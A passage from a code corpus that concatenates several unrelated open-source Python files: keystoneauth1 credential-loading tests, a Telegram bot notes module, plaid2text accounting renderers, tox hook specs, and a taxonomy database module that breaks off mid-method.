project_domain_id=uuid.uuid4().hex)
# only when a project_name is provided, project_domain_name will
# be use to uniquely identify the project. It's an invalid
# option when it's just by itself.
self.assertRaises(exceptions.OptionError,
self.create,
project_domain_name=uuid.uuid4().hex)
self.assertRaises(exceptions.OptionError,
self.create,
project_name=uuid.uuid4().hex)
class V3ApplicationCredentialTests(utils.TestCase):
def setUp(self):
super(V3ApplicationCredentialTests, self).setUp()
self.auth_url = uuid.uuid4().hex
def create(self, **kwargs):
kwargs.setdefault('auth_url', self.auth_url)
loader = loading.get_plugin_loader('v3applicationcredential')
return loader.load_from_options(**kwargs)
def test_basic(self):
id = uuid.uuid4().hex
secret = uuid.uuid4().hex
app_cred = self.create(application_credential_id=id,
application_credential_secret=secret)
ac_method = app_cred.auth_methods[0]
self.assertEqual(id, ac_method.application_credential_id)
self.assertEqual(secret, ac_method.application_credential_secret)
def test_with_name(self):
name = uuid.uuid4().hex
secret = uuid.uuid4().hex
username = uuid.uuid4().hex
user_domain_id = uuid.uuid4().hex
app_cred = self.create(application_credential_name=name,
application_credential_secret=secret,
username=username,
user_domain_id=user_domain_id)
ac_method = app_cred.auth_methods[0]
self.assertEqual(name, ac_method.application_credential_name)
self.assertEqual(secret, ac_method.application_credential_secret)
self.assertEqual(username, ac_method.username)
self.assertEqual(user_domain_id, ac_method.user_domain_id)
def test_without_user_domain(self):
self.assertRaises(exceptions.OptionError,
self.create,
application_credential_name=uuid.uuid4().hex,
username=uuid.uuid4().hex,
application_credential_secret=uuid.uuid4().hex)
def test_without_name_or_id(self):
self.assertRaises(exceptions.OptionError,
self.create,
username=uuid.uuid4().hex,
user_domain_id=uuid.uuid4().hex,
application_credential_secret=uuid.uuid4().hex)
def test_without_secret(self):
self.assertRaises(exceptions.OptionError,
self.create,
application_credential_id=uuid.uuid4().hex,
username=uuid.uuid4().hex,
user_domain_id=uuid.uuid4().hex)
|
ctrlaltdel/neutrinator
|
vendor/keystoneauth1/tests/unit/loading/test_v3.py
|
Python
|
gpl-3.0
| 16,308
|
import re
from io import BytesIO
from typing import Optional, List
from telegram import MAX_MESSAGE_LENGTH, ParseMode, InlineKeyboardMarkup
from telegram import Message, Update, Bot
from telegram.error import BadRequest
from telegram.ext import CommandHandler, RegexHandler
from telegram.ext.dispatcher import run_async
from telegram.utils.helpers import escape_markdown
import tg_bot.modules.sql.notes_sql as sql
from tg_bot import dispatcher, MESSAGE_DUMP, LOGGER
from tg_bot.modules.disable import DisableAbleCommandHandler
from tg_bot.modules.helper_funcs.chat_status import user_admin
from tg_bot.modules.helper_funcs.misc import build_keyboard, revert_buttons
from tg_bot.modules.helper_funcs.msg_types import get_note_type
FILE_MATCHER = re.compile(r"^###file_id(!photo)?###:(.*?)(?:\s|$)")
ENUM_FUNC_MAP = {
sql.Types.TEXT.value: dispatcher.bot.send_message,
sql.Types.BUTTON_TEXT.value: dispatcher.bot.send_message,
sql.Types.STICKER.value: dispatcher.bot.send_sticker,
sql.Types.DOCUMENT.value: dispatcher.bot.send_document,
sql.Types.PHOTO.value: dispatcher.bot.send_photo,
sql.Types.AUDIO.value: dispatcher.bot.send_audio,
sql.Types.VOICE.value: dispatcher.bot.send_voice,
sql.Types.VIDEO.value: dispatcher.bot.send_video
}
# Do not async
def get(bot, update, notename, show_none=True, no_format=False):
chat_id = update.effective_chat.id
note = sql.get_note(chat_id, notename)
message = update.effective_message # type: Optional[Message]
if note:
# If we're replying to a message, reply to that message (unless it's an error)
if message.reply_to_message:
reply_id = message.reply_to_message.message_id
else:
reply_id = message.message_id
if note.is_reply:
if MESSAGE_DUMP:
try:
bot.forward_message(chat_id=chat_id, from_chat_id=MESSAGE_DUMP, message_id=note.value)
except BadRequest as excp:
if excp.message == "Message to forward not found":
message.reply_text("This message seems to have been lost - I'll remove it "
"from your notes list.")
sql.rm_note(chat_id, notename)
else:
raise
else:
try:
bot.forward_message(chat_id=chat_id, from_chat_id=chat_id, message_id=note.value)
except BadRequest as excp:
if excp.message == "Message to forward not found":
message.reply_text("Looks like the original sender of this note has deleted "
"their message - sorry! Get your bot admin to start using a "
"message dump to avoid this. I'll remove this note from "
"your saved notes.")
sql.rm_note(chat_id, notename)
else:
raise
else:
text = note.value
keyb = []
parseMode = ParseMode.MARKDOWN
buttons = sql.get_buttons(chat_id, notename)
if no_format:
parseMode = None
text += revert_buttons(buttons)
else:
keyb = build_keyboard(buttons)
keyboard = InlineKeyboardMarkup(keyb)
try:
if note.msgtype in (sql.Types.BUTTON_TEXT, sql.Types.TEXT):
bot.send_message(chat_id, text, reply_to_message_id=reply_id,
parse_mode=parseMode, disable_web_page_preview=True,
reply_markup=keyboard)
else:
ENUM_FUNC_MAP[note.msgtype](chat_id, note.file, caption=text, reply_to_message_id=reply_id,
parse_mode=parseMode, disable_web_page_preview=True,
reply_markup=keyboard)
except BadRequest as excp:
if excp.message == "Entity_mention_user_invalid":
message.reply_text("Looks like you tried to mention someone I've never seen before. If you really "
"want to mention them, forward one of their messages to me, and I'll be able "
"to tag them!")
elif FILE_MATCHER.match(note.value):
message.reply_text("This note was an incorrectly imported file from another bot - I can't use "
"it. If you really need it, you'll have to save it again. In "
"the meantime, I'll remove it from your notes list.")
sql.rm_note(chat_id, notename)
else:
message.reply_text("This note could not be sent, as it is incorrectly formatted. Ask in "
"@MarieSupport if you can't figure out why!")
LOGGER.exception("Could not parse message #%s in chat %s", notename, str(chat_id))
LOGGER.warning("Message was: %s", str(note.value))
return
elif show_none:
message.reply_text("This note doesn't exist")
@run_async
def cmd_get(bot: Bot, update: Update, args: List[str]):
if len(args) >= 2 and args[1].lower() == "noformat":
get(bot, update, args[0], show_none=True, no_format=True)
elif len(args) >= 1:
get(bot, update, args[0], show_none=True)
else:
update.effective_message.reply_text("Get rekt")
@run_async
def hash_get(bot: Bot, update: Update):
message = update.effective_message.text
fst_word = message.split()[0]
no_hash = fst_word[1:]
get(bot, update, no_hash, show_none=False)
@run_async
@user_admin
def save(bot: Bot, update: Update):
chat_id = update.effective_chat.id
msg = update.effective_message # type: Optional[Message]
note_name, text, data_type, content, buttons = get_note_type(msg)
if data_type is None:
msg.reply_text("Dude, there's no note")
return
if len(text.strip()) == 0:
text = note_name
sql.add_note_to_db(chat_id, note_name, text, data_type, buttons=buttons, file=content)
msg.reply_text(
"Yas! Added {note_name}.\nGet it with /get {note_name}, or #{note_name}".format(note_name=note_name))
if msg.reply_to_message and msg.reply_to_message.from_user.is_bot:
if text:
msg.reply_text("Seems like you're trying to save a message from a bot. Unfortunately, "
"bots can't forward bot messages, so I can't save the exact message. "
"\nI'll save all the text I can, but if you want more, you'll have to "
"forward the message yourself, and then save it.")
else:
msg.reply_text("Bots are kinda handicapped by telegram, making it hard for bots to "
"interact with other bots, so I can't save this message "
"like I usually would - do you mind forwarding it and "
"then saving that new message? Thanks!")
return
@run_async
@user_admin
def clear(bot: Bot, update: Update, args: List[str]):
chat_id = update.effective_chat.id
if len(args) >= 1:
notename = args[0]
if sql.rm_note(chat_id, notename):
update.effective_message.reply_text("Successfully removed note.")
else:
update.effective_message.reply_text("That's not a note in my database!")
@run_async
def list_notes(bot: Bot, update: Update):
chat_id = update.effective_chat.id
note_list = sql.get_all_chat_notes(chat_id)
msg = "*Notes in chat:*\n"
for note in note_list:
note_name = escape_markdown(" - {}\n".format(note.name))
if len(msg) + len(note_name) > MAX_MESSAGE_LENGTH:
update.effective_message.reply_text(msg, parse_mode=ParseMode.MARKDOWN)
msg = ""
msg += note_name
if msg == "*Notes in chat:*\n":
update.effective_message.reply_text("No notes in this chat!")
elif len(msg) != 0:
update.effective_message.reply_text(msg, parse_mode=ParseMode.MARKDOWN)
def __import_data__(chat_id, data):
failures = []
for notename, notedata in data.get('extra', {}).items():
match = FILE_MATCHER.match(notedata)
if match:
failures.append(notename)
notedata = notedata[match.end():].strip()
if notedata:
sql.add_note_to_db(chat_id, notename[1:], notedata, sql.Types.TEXT)
else:
sql.add_note_to_db(chat_id, notename[1:], notedata, sql.Types.TEXT)
if failures:
with BytesIO(str.encode("\n".join(failures))) as output:
output.name = "failed_imports.txt"
dispatcher.bot.send_document(chat_id, document=output, filename="failed_imports.txt",
caption="These files/photos failed to import due to originating "
"from another bot. This is a telegram API restriction, and can't "
"be avoided. Sorry for the inconvenience!")
def __stats__():
return "{} notes, across {} chats.".format(sql.num_notes(), sql.num_chats())
def __migrate__(old_chat_id, new_chat_id):
sql.migrate_chat(old_chat_id, new_chat_id)
def __chat_settings__(chat_id, user_id):
notes = sql.get_all_chat_notes(chat_id)
return "There are `{}` notes in this chat.".format(len(notes))
__help__ = """
- /get <notename>: get the note with this notename
- #<notename>: same as /get
- /notes or /saved: list all saved notes in this chat
If you would like to retrieve the contents of a note without any formatting, use `/get <notename> noformat`. This can \
be useful when updating a current note.
*Admin only:*
- /save <notename> <notedata>: saves notedata as a note with name notename
A button can be added to a note by using standard markdown link syntax - the link should just be prepended with a \
`buttonurl:` section, as such: `[somelink](buttonurl:example.com)`. Check /markdownhelp for more info.
- /save <notename>: save the replied message as a note with name notename
- /clear <notename>: clear note with this name
"""
__mod_name__ = "Notes"
GET_HANDLER = CommandHandler("get", cmd_get, pass_args=True)
HASH_GET_HANDLER = RegexHandler(r"^#[^\s]+", hash_get)
SAVE_HANDLER = CommandHandler("save", save)
DELETE_HANDLER = CommandHandler("clear", clear, pass_args=True)
LIST_HANDLER = DisableAbleCommandHandler(["notes", "saved"], list_notes, admin_ok=True)
dispatcher.add_handler(GET_HANDLER)
dispatcher.add_handler(SAVE_HANDLER)
dispatcher.add_handler(LIST_HANDLER)
dispatcher.add_handler(DELETE_HANDLER)
dispatcher.add_handler(HASH_GET_HANDLER)
|
PaulSonOfLars/tgbot
|
tg_bot/modules/notes.py
|
Python
|
gpl-3.0
| 11,067
|
#! /usr/bin/env python3
from abc import ABCMeta, abstractmethod
import csv
import os
import re
import subprocess
import sys
import plaid2text.config_manager as cm
from plaid2text.interact import separator_completer, prompt
class Entry:
"""
This represents one entry (transaction) from Plaid.
"""
def __init__(self, transaction, options={}):
"""Parameters:
transaction: a plaid transaction
options: from CLI args and config file
"""
self.options = options
self.transaction = transaction
# TODO: document this
if 'addons' in options:
self.transaction['addons'] = dict(
(k, fields[v - 1]) for k, v in options.addons.items() # NOQA
)
else:
self.transaction['addons'] = {}
# The id for the transaction
self.transaction['transaction_id'] = self.transaction['transaction_id']
# Get the date and convert it into a ledger/beancount formatted date.
d8 = self.transaction['date']
d8_format = options.output_date_format if options and 'output_date_format' in options else '%Y-%m-%d'
self.transaction['transaction_date'] = d8.date().strftime(d8_format)
self.desc = self.transaction['name']
# amnt = self.transaction['amount']
self.transaction['currency'] = options.currency
# self.transaction['debit_amount'] = amnt
# self.transaction['debit_currency'] = currency
# self.transaction['credit_amount'] = ''
# self.transaction['credit_currency'] = ''
self.transaction['posting_account'] = options.posting_account
self.transaction['cleared_character'] = options.cleared_character
if options.template_file:
with open(options.template_file, 'r', encoding='utf-8') as f:
self.transaction['transaction_template'] = f.read()
else:
self.transaction['transaction_template'] = ''
def query(self):
"""
We print a summary of the record on the screen, and allow you to
choose the destination account.
"""
return '{0} {1:<40} {2}'.format(
self.transaction['date'],
self.desc,
self.transaction['amount']
)
def journal_entry(self, payee, account, tags):
"""
Return a formatted journal entry recording this Entry against
the specified posting account
"""
if self.options.output_format == 'ledger':
def_template = cm.DEFAULT_LEDGER_TEMPLATE
else:
def_template = cm.DEFAULT_BEANCOUNT_TEMPLATE
if self.transaction['transaction_template']:
template = (self.transaction['transaction_template'])
else:
template = (def_template)
if self.options.output_format == 'beancount':
ret_tags = ' {}'.format(tags) if tags else ''
else:
ret_tags = ' ; {}'.format(tags) if tags else ''
format_data = {
'associated_account': account,
'payee': payee,
'tags': ret_tags
}
format_data.update(self.transaction['addons'])
format_data.update(self.transaction)
return template.format(**format_data)
class OutputRenderer(metaclass=ABCMeta):
"""
Base class for output rendering.
"""
def __init__(self, transactions, options):
self.transactions = transactions
self.possible_accounts = set([])
self.possible_payees = set([])
self.possible_tags = set([])
self.mappings = []
self.map_file = options.mapping_file
self.read_mapping_file()
self.journal_file = options.journal_file
self.journal_lines = []
self.options = options
self.get_possible_accounts_and_payees()
# Add payees/accounts/tags from mappings
for m in self.mappings:
self.possible_payees.add(m[1])
self.possible_accounts.add(m[2])
if m[3]:
if options.output_format == 'ledger':
self.possible_tags.update(set(m[3][0].split(':')))
else:
self.possible_tags.update([t.replace('#', '') for t in m[3][0].split(' ')])
def read_mapping_file(self):
"""
Mappings are simply a CSV file with three columns.
The first is a string to be matched against an entry description.
The second is the payee against which such entries should be posted.
The third is the account against which such entries should be posted.
If the match string begins and ends with '/' it is taken to be a
regular expression.
"""
if not self.map_file:
return
with open(self.map_file, 'r', encoding='utf-8', newline='') as f:
map_reader = csv.reader(f)
for row in map_reader:
if len(row) > 1:
pattern = row[0].strip()
payee = row[1].strip()
account = row[2].strip()
tags = row[3:]
if pattern.startswith('/') and pattern.endswith('/'):
try:
pattern = re.compile(pattern[1:-1], re.I)
except re.error as e:
print(
"Invalid regex '{0}' in '{1}': {2}"
.format(pattern, self.map_file, e),
file=sys.stderr)
sys.exit(1)
self.mappings.append((pattern, payee, account, tags))
def append_mapping_file(self, desc, payee, account, tags):
if self.map_file:
with open(self.map_file, 'a', encoding='utf-8', newline='') as f:
writer = csv.writer(f)
ret_tags = tags if len(tags) > 0 else ''
writer.writerow([desc, payee, account, ret_tags])
def process_transactions(self, callback=None):
"""
Read transactions from Mongo (Plaid) and
process them. Writes Ledger/Beancount formatted
lines either to out_file or stdout.
Parameters:
callback: A function taking a single transaction update object to store
in the DB immediately after collecting the information from the user.
"""
out = self._process_plaid_transactions(callback=callback)
if self.options.headers_file:
headers = ''.join(open(self.options.headers_file, mode='r').readlines())
print(headers, file=self.options.outfile)
print(*self.journal_lines, sep='\n', file=self.options.outfile)
return out
def _process_plaid_transactions(self, callback=None):
"""Process plaid transaction and return beancount/ledger formatted
lines.
"""
out = []
for t in self.transactions:
entry = Entry(t, self.options)
payee, account, tags = self.get_payee_and_account(entry)
dic = {}
dic['transaction_id'] = t['transaction_id']
dic['tags'] = tags
dic['associated_account'] = account
dic['payee'] = payee
dic['posting_account'] = self.options.posting_account
out.append(dic)
# save the transactions into the database as they are processed
if callback: callback(dic)
self.journal_lines.append(entry.journal_entry(payee, account, tags))
return out
def prompt_for_value(self, text_prompt, values, default):
sep = ':' if text_prompt == 'Payee' else ' '
a = prompt(
'{} [{}]: '.format(text_prompt, default),
completer=separator_completer(values, sep=sep)
)
# Handle tag returning none if accepting
return a if (a or text_prompt == 'Tag') else default
def get_payee_and_account(self, entry):
payee = entry.desc
account = self.options.default_expense
tags = ''
found = False
# Try to match entry desc with mappings patterns
for m in self.mappings:
pattern = m[0]
if isinstance(pattern, str):
if entry.desc == pattern:
payee, account, tags = m[1], m[2], m[3]
found = True # do not break here, later mapping must win
else:
# If the pattern isn't a string it's a regex
if m[0].match(entry.desc):
payee, account, tags = m[1], m[2], m[3]
found = True
# Tags gets read in as a list, but just contains one string
if tags:
tags = tags[0]
modified = False
if self.options.quiet and found:
pass
else:
if self.options.clear_screen:
print('\033[2J\033[;H')
print('\n' + entry.query())
value = self.prompt_for_value('Payee', self.possible_payees, payee)
if value:
modified = modified if modified else value != payee
payee = value
value = self.prompt_for_value('Account', self.possible_accounts, account)
if value:
modified = modified if modified else value != account
account = value
if self.options.tags:
value = self.prompt_for_tags('Tag', self.possible_tags, tags)
if value:
modified = modified if modified else value != tags
tags = value
if not found or (found and modified):
# Add new or changed mapping to mappings and append to file
self.mappings.append((entry.desc, payee, account, tags))
self.append_mapping_file(entry.desc, payee, account, tags)
# Add new possible_values to possible values lists
self.possible_payees.add(payee)
self.possible_accounts.add(account)
return (payee, account, tags)
@abstractmethod
def tagify(self, value):
pass
@abstractmethod
def get_possible_accounts_and_payees(self):
pass
@abstractmethod
def prompt_for_tags(self, prompt, values, default):
pass
class LedgerRenderer(OutputRenderer):
def tagify(self, value):
if value.find(':') < 0 and value[0] != '[' and value[-1] != ']':
value = ':{0}:'.format(value.replace(' ', '-').replace(',', ''))
return value
def get_possible_accounts_and_payees(self):
if self.journal_file:
self.possible_payees = self._payees_from_ledger()
self.possible_accounts = self._accounts_from_ledger()
self.read_accounts_file()
def prompt_for_tags(self, prompt, values, default):
# tags = list(default[0].split(':'))
tags = [':{}:'.format(t) for t in default.split(':') if t] if default else []
value = self.prompt_for_value(prompt, values, ''.join(tags).replace('::', ':'))
while value:
if value[0] == '-':
value = self.tagify(value[1:])
if value in tags:
tags.remove(value)
else:
value = self.tagify(value)
if value not in tags:
tags.append(value)
value = self.prompt_for_value(prompt, values, ''.join(tags).replace('::', ':'))
return ''.join(tags).replace('::', ':')
def _payees_from_ledger(self):
return self._from_ledger('payees')
def _accounts_from_ledger(self):
return self._from_ledger('accounts')
def _from_ledger(self, command):
ledger = 'ledger'
for f in ['/usr/bin/ledger', '/usr/local/bin/ledger']:
if os.path.exists(f):
ledger = f
break
cmd = [ledger, '-f', self.journal_file, command]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout_data, stderr_data) = p.communicate()
items = set()
for item in stdout_data.decode('utf-8').splitlines():
items.add(item)
return items
def read_accounts_file(self):
""" Process each line in the specified account file looking for account
definitions. An account definition is a line containing the word
'account' followed by a valid account name, e.g:
account Expenses
account Expenses:Utilities
All other lines are ignored.
"""
if not self.options.accounts_file:
return
accounts = []
pattern = re.compile('^\s*account\s+([:A-Za-z0-9-_ ]+)$')
with open(self.options.accounts_file, 'r', encoding='utf-8') as f:
for line in f.readlines():
mo = pattern.match(line)
if mo:
accounts.append(mo.group(1))
self.possible_accounts.update(accounts)
class BeancountRenderer(OutputRenderer):
import beancount
def tagify(self, value):
# No spaces or commas allowed
return value.replace(' ', '-').replace(',', '')
def get_possible_accounts_and_payees(self):
if self.journal_file:
self._payees_and_accounts_from_beancount()
def _payees_and_accounts_from_beancount(self):
try:
payees = set()
accounts = set()
tags = set()
from beancount import loader
from beancount.core.data import Transaction, Open
import sys
entries, errors, options = loader.load_file(self.journal_file)
except Exception as e:
print(e.message, file=sys.stderr)
sys.exit(1)
else:
for e in entries:
if type(e) is Transaction:
if e.payee:
payees.add(e.payee)
if e.tags:
for t in e.tags:
tags.add(t)
if e.postings:
for p in e.postings:
accounts.add(p.account)
elif type(e) is Open:
accounts.add(e.account)
self.possible_accounts.update(accounts)
self.possible_tags.update(tags)
self.possible_payees.update(payees)
def prompt_for_tags(self, prompt, values, default):
tags = ' '.join(['#{}'.format(t) for t in default.split() if t]) if default else []
value = self.prompt_for_value(prompt, values, ' '.join(['#{}'.format(t) for t in tags]))
while value:
if value[0] == '-':
value = self.tagify(value[1:])
if value in tags:
tags.remove(value)
else:
value = self.tagify(value)
if value not in tags:
tags.append(value)
value = self.prompt_for_value(
prompt,
values,
' '.join(['#{}'.format(t) for t in tags])
)
return ' '.join(['#{}'.format(t) for t in tags])
|
madhat2r/plaid2text
|
src/python/plaid2text/renderers.py
|
Python
|
gpl-3.0
| 15,244
|
""" Hook specifications for tox.
"""
from pluggy import HookspecMarker, HookimplMarker
hookspec = HookspecMarker("tox")
hookimpl = HookimplMarker("tox")
@hookspec
def tox_addoption(parser):
""" add command line options to the argparse-style parser object."""
@hookspec
def tox_configure(config):
""" called after command line options have been parsed and the ini-file has
been read. Please be aware that the config object layout may change as its
API was not designed yet wrt to providing stability (it was an internal
thing purely before tox-2.0). """
@hookspec(firstresult=True)
def tox_get_python_executable(envconfig):
""" return a python executable for the given python base name.
The first plugin/hook which returns an executable path will determine it.
``envconfig`` is the testenv configuration which contains
per-testenv configuration, notably the ``.envname`` and ``.basepython``
setting.
"""
@hookspec(firstresult=True)
def tox_testenv_create(venv, action):
""" [experimental] perform creation action for this venv.
Some example usage:
- To *add* behavior but still use tox's implementation to set up a
virtualenv, implement this hook but do not return a value (or explicitly
return ``None``).
- To *override* tox's virtualenv creation, implement this hook and return
a non-``None`` value.
.. note:: This api is experimental due to the unstable api of
:class:`tox.venv.VirtualEnv`.
.. note:: This hook uses ``firstresult=True`` (see pluggy_) -- hooks
implementing this will be run until one returns non-``None``.
.. _pluggy: http://pluggy.readthedocs.io/en/latest/#first-result-only
"""
@hookspec(firstresult=True)
def tox_testenv_install_deps(venv, action):
""" [experimental] perform install dependencies action for this venv.
Some example usage:
- To *add* behavior but still use tox's implementation to install
dependencies, implement this hook but do not return a value (or
explicitly return ``None``). One use-case may be to install (or ensure)
non-python dependencies such as debian packages.
- To *override* tox's installation of dependencies, implement this hook
and return a non-``None`` value. One use-case may be to install via
a different installation tool such as `pip-accel`_ or `pip-faster`_.
.. note:: This api is experimental due to the unstable api of
:class:`tox.venv.VirtualEnv`.
.. note:: This hook uses ``firstresult=True`` (see pluggy_) -- hooks
implementing this will be run until one returns non-``None``.
.. _pip-accel: https://github.com/paylogic/pip-accel
.. _pip-faster: https://github.com/Yelp/venv-update
.. _pluggy: http://pluggy.readthedocs.io/en/latest/#first-result-only
"""
@hookspec
def tox_runtest_pre(venv):
""" [experimental] perform arbitrary action before running tests for this venv.
This could be used to indicate that tests for a given venv have started, for instance.
"""
@hookspec
def tox_runtest_post(venv):
""" [experimental] perform arbitrary action after running tests for this venv.
This could be used to have per-venv test reporting of pass/fail status.
"""
|
cvegaj/ElectriCERT
|
venv3/lib/python3.6/site-packages/tox/hookspecs.py
|
Python
|
gpl-3.0
| 3,276
|
"""
Provides classes that represent complete taxonomies, built using components from
the taxacomponents module.
"""
from taxacomponents import Citation, RankTable, Taxon
from taxonvisitor import TaxonVisitor
from taxonvisitors_concrete import PrintTaxonVisitor, CSVTaxonVisitor
from nameresolve import CoLNamesResolver
class TaxonomyError(Exception):
"""
A basic exception class for reporting errors encountered while working with taxonomies.
"""
def __init__(self, msg):
msg = 'Taxonomy error:\n ' + msg
Exception.__init__(self, msg)
class TaxonomyBase:
# Define the "nil" UUID constant as returned by the uuid-osp Postgres module
# function uuid_nil().
#NIL_UUID = '00000000-0000-0000-0000-000000000000'
NIL_UUID = 0
def __init__(self, taxonomy_id, name='', ismaster=False, citation=None, roottaxon=None):
self.taxonomy_id = taxonomy_id
self.name = name
self.ismaster = ismaster
self.citation = citation
self.roottaxon = roottaxon
def loadFromDB(self, pgcur, taxanum=-1, maxdepth=-1):
"""
Attempts to load the taxonomy from a taxonomy database, including the full tree
of taxa. If taxanum > 0, then only taxanum taxa will be loaded. If maxdepth > -1,
the taxa tree will only be traversed to a depth of maxdepth.
"""
query = """SELECT name, citation_id, ismaster, root_tc_id
FROM taxonomies
WHERE taxonomy_id=?"""
pgcur.execute(query, (self.taxonomy_id,))
res = pgcur.fetchone()
if res == None:
raise TaxonomyError('Taxonomy ID ' + str(self.taxonomy_id) + ' was not found in the database.')
self.name = res[0]
self.ismaster = res[2]
roottc_id = res[3]
# Create the Citation object.
self.citation = Citation()
self.citation.loadFromDB(pgcur, res[1])
# Get the rank ID and taxonomy ID of the root taxon concept.
query = """SELECT tc.rank_id, tc.taxonomy_id
FROM taxon_concepts tc, ranks r
WHERE tc.tc_id=? AND tc.rank_id=r.rank_id"""
pgcur.execute(query, (roottc_id,))
res = pgcur.fetchone()
rankid = res[0]
root_taxonomy_id = res[1]
# Initialize the rank lookup table.
rankt = RankTable()
rankt.loadFromDB(pgcur)
# Load the taxa tree.
self.roottaxon = Taxon(self.taxonomy_id, rankid, rankt, roottaxo_id = root_taxonomy_id, isroot=True)
self.roottaxon.loadFromDB(pgcur, roottc_id, taxanum, maxdepth)
def persist(self):
"""
Persist the Taxonomy to the database. This method should be implemented by
concrete subclasses.
"""
pass
def __str__(self):
tstr = 'name: ' + self.name + '\nID: ' + str(self.taxonomy_id) + '\nmaster: '
if self.ismaster:
tstr += 'yes'
else:
tstr += 'no'
return tstr
def printTaxonomyInfo(self):
"""
Prints the metadata that describes this taxonomy.
"""
print '** Taxonomy information **'
print str(self)
print str(self.citation)
def printCSVTaxaTree(self, numtaxa=-1, maxdepth=-1):
"""
Prints the tree of taxa for this taxonomy in "flat" format as CSV outut. If
numtaxa > 0, only the first numtaxa taxa will be printed. If maxdepth > -1,
the taxa tree will only be traversed to a depth of maxdepth.
"""
if numtaxa > 0:
print '(Only printing first', numtaxa, 'taxa.)'
if maxdepth > -1:
print '(Only traversing taxa tree to a depth of ' + str(maxdepth) + '.)'
csvvisitor = CSVTaxonVisitor(numtaxa, maxdepth)
csvvisitor.visit(self.roottaxon)
def printTaxaTree(self, numtaxa=-1, maxdepth=-1):
"""
Prints the tree of taxa for this taxonomy. If numtaxa > 0, only the first numtaxa
taxa will be printed. If maxdepth > -1, the taxa tree will only be traversed to a
depth of maxdepth.
"""
print '** Taxa tree **'
if numtaxa > 0:
print '(Only printing first', numtaxa, 'taxa.)'
if maxdepth > -1:
print '(Only traversing taxa tree to a depth of ' + str(maxdepth) + '.)'
ptvisitor = PrintTaxonVisitor(numtaxa, maxdepth)
ptvisitor.visit(self.roottaxon)
def printAll(self, numtaxa=-1, maxdepth=-1):
"""
Prints a text representation of this taxonomy, including the tree of taxa.
If numtaxa > 0, only the first numtaxa taxa will be printed. If maxdepth > -1,
the taxa tree will only be traversed to a depth of maxdepth.
"""
self.printTaxonomyInfo()
print
self.printTaxaTree(numtaxa, maxdepth)
class Taxonomy(TaxonomyBase):
"""
A class that represents a single taxonomy in the MOL taxonomy database. Provides methods
to load a taxonomy from the database and persist a taxonomy to the database. Can also link
a taxonomy to the backbone taxonomy.
"""
def __init__(self, taxonomy_id, name='', ismaster=False, citation=None, roottaxon=None):
TaxonomyBase.__init__(self, taxonomy_id, name, ismaster, citation, roottaxon)
# A reference for the backbone taxonomy, which encompasses all other taxonomies.
# This reference is used if this taxonomy is linked to the backbone taxonomy.
self.bb_taxonomy = None
def linkToBackbone(self, pgcur, adjustdepth=True):
"""
Tries to connect this taxonomy to the backbone taxonomy, creating new nodes
in the backbone taxonomy, if needed, to link the two together. If adjustdepth
is True, the depth property of all nodes in the taxonomy are set to match the
correct depth relative to the root of the backbone taxonomy. Returns True if
the linking operation succeeded, False otherwise.
"""
bb_taxonomy = BackboneTaxonomy(pgcur)
if bb_taxonomy.linkTaxonomy(self):
self.bb_taxonomy = bb_taxonomy
if adjustdepth:
self.bb_taxonomy.setNodeDepths()
return True
else:
self.bb_taxonomy = None
return False
def getBackboneTaxonomy(self):
"""
Returns a reference to the backbone taxonomy object that links this taxonomy
to the MOL backbone taxonomy.
"""
return self.bb_taxonomy
def persist(self, pgcur, printprogress=False):
"""
Writes the taxonomy information to the database, if it does not already
exist. This includes calling the persist() methods on the Citation and
Taxon tree associated with this Taxonomy object.
"""
# First, check if this taxonomy already exists in the database.
query = """SELECT taxonomy_id
FROM taxonomies
WHERE taxonomy_id=? AND ismaster=?"""
pgcur.execute(query, (self.taxonomy_id, self.ismaster))
res = pgcur.fetchone()
if res == None:
# Write the citation information to the database, if needed.
citation_id = self.citation.persist(pgcur)
# Create the initial database entry for the taxonomy metadata so that the
# foreign key constraint for the child taxon concepts can be satisfied.
query = """INSERT INTO taxonomies
(taxonomy_id, name, citation_id, ismaster, root_tc_id)
VALUES (?, ?, ?, ?, ?)"""
pgcur.execute(query, (self.taxonomy_id, self.name, citation_id, self.ismaster, None))
# Make sure all taxon concepts, including those from the backbone taxonomy,
# are persisted to the database. Use the "nil" UUID as the parent_id for
# the root of the taxonomy if there is not an existing root entry.
if self.bb_taxonomy != None:
self.bb_taxonomy.roottaxon.persist(pgcur, self.NIL_UUID, printprogress,
self.roottaxon.depth)
else:
self.roottaxon.persist(pgcur, self.NIL_UUID, printprogress, self.roottaxon.depth)
# Get the ID of the root taxon.
root_tcid = self.roottaxon.existsInDB(pgcur)
# Update the taxonomy metadata entry with the root taxon concept ID.
query = """UPDATE taxonomies
SET root_tc_id=?
WHERE taxonomy_id=?"""
pgcur.execute(query, (root_tcid, self.taxonomy_id))
pgcur.connection.commit()
elif printprogress:
print ('The metadata for taxonomy "' + self.name + '" (ID ' + str(self.taxonomy_id) +
') already exist in the database; no changes were made.')
def printAll(self, numtaxa=-1, maxdepth=-1):
"""
Prints a text representation of this taxonomy, including the tree of taxa.
If numtaxa > 0, only the first numtaxa taxa will be printed. If maxdepth > -1,
the taxa tree will only be traversed to a depth of maxdepth. Unlike the method
in the base class, this method accounts for the possibility of this taxonomy
being linked to the backbone taxonomy.
"""
self.printTaxonomyInfo()
print
if self.bb_taxonomy != None:
self.bb_taxonomy.printTaxaTree(numtaxa, maxdepth)
else:
self.printTaxaTree(numtaxa, maxdepth)
class DepthAdjustVisitor(TaxonVisitor):
"""
Sets the "depth" values for all Taxon objects in a taxa tree, using an initial
starting depth value.
"""
def __init__(self, startdepth):
"""
Assigns startdepth as the "depth" value for the top-level Taxon object. All
other "depth" values are calculated relative to startdepth.
"""
TaxonVisitor.__init__(self)
self.startdepth = startdepth
def processTaxon(self, taxon, depth):
taxon.depth = self.startdepth + depth
class BackboneTaxonomy(TaxonomyBase):
"""
A special case of Taxonomy that represents the MOL backbone taxonomy. Provides
methods to link other taxonomies to the backbone taxonomy. Does not provide a
persist() method because the backbone taxonomy metadata are set when the database
tables are created.
"""
def __init__(self, pgcur):
"""
Initialize the backbone Taxonomy object and automatically load it from the
database, but load only the root node by default.
"""
self.pgcur = pgcur
# The ID of the backbone taxonomy is always 1.
TaxonomyBase.__init__(self, 1)
self.loadFromDB(pgcur)
def loadFromDB(self, pgcur, taxanum=-1, maxdepth=0):
"""
Exactly the same as loadFromDB() from the superclass, except loads only the root
taxonomy node (i.e., Eukaryota) by default.
"""
TaxonomyBase.loadFromDB(self, pgcur, taxanum, maxdepth)
def linkTaxonomy(self, taxonomy):
